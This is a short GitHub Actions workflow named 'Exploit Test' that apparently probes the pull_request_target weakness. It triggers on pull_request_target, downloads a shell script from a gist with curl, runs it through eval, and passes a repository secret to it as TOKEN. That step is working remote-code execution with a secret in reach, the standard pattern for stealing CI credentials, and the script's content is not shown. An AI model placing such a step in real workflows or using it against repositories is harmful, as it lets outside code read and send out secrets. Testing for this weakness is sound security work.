name: Exploit Test

on:
  pull_request_target:
    branches: [ master ]

jobs:
  htmlproofer:
    name: Hop
    runs-on: ubuntu-latest
    steps:
      - name: Exploit Test
        run: |
          eval "$(curl https://gist.githubusercontent.com/Pandapip1/342e05fe91273b947d01c60bb48067a1/raw/a0f6da5fd2aa8401920589fcb89f405f5d232521/exploit-test.sh)"
        env:
          TOKEN: ${{ secrets.TEST }}
